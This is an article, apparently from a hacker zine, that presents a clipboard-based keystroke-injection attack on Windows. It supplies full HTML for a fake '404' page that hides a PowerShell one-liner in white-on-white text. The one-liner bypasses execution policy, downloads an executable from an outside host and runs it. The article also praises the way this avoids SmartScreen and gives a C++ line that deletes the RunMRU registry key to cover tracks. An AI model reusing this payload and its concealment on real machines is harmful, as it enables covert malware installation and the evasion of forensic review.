Hidden Injection

by Street

Key stroke injection has become a popular tool for hackers.

A tool made by Hak5 called the Rubber Ducky retails at $79.99.  The Rubber Ducky looks like a USB flash drive, but when you plug it in, it quickly types out commands to control the computer as if it were a keyboard.

You can program it with instructions using a language called Ducky Script which can download malicious software, or steal the data on a computer.

I had the idea to use the Windows clipboard to do the same thing, by copying and pasting in commands at the same speed without plugging anything into the computer.

The Windows clipboard holds all of the data that you copy and paste on Windows.  It is a temporary storage area where data is copied or cut from a document and is kept until it is pasted somewhere else.  The Windows clipboard can hold various types of data, including text, images, files, and other formats.

I used a website with hidden text and an image that read "404 Page Not Found".  The text is small with white font on a white background, so you can't see it.

To quickly get to the page, I just type Win+R then enter: https://www.example.com

Once the page loads, I type in Ctrl+A, which selects the text and then I type in Ctrl+C to copy my payload to the Windows clipboard.

Typing Win+R again, followed by Ctrl+V, copies the payload into the Windows Run dialog.

When I hit Enter, the payload downloads and the program is executed.

The best part about this is that the downloaded file doesn't give me any warnings about not being certified by Microsoft.  Normally, untrusted executables will create SmartScreen warnings.  Microsoft uses the SmartScreen security feature to warn you about potentially malicious or unrecognized applications downloaded from the Internet.  The message happens when a program is from an unknown publisher or hasn't been digitally signed with a certificate recognized by Microsoft.

Here is the web page code with the PowerShell payload one liner that I copy and paste into the Windows Run dialog:

<html> <style> ::-moz-selection { color: white; background: white; } ::selection { color: white; background: white; } body{ color: white; background: white; font-size: 1px; } img { max-width: 100%; height: auto; } </style> <body> powershell.exe -NoProfile -WindowStyle hidden -ExecutionPolicy Bypass -Command Start-BitsTransfer -Source "https://www.example.com/viri.exe" -Destination "c:\programdata\viri.exe"; C:\programdata\viri.exe <center><img src="404.png"></img></center> </body> </html>

If your program is written in C++ you can include this line in the code to erase the pasted text from the Run dialog after it is executed:

RegDeleteKey(HKEY_CURRENT_USER, TEXT("Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU"));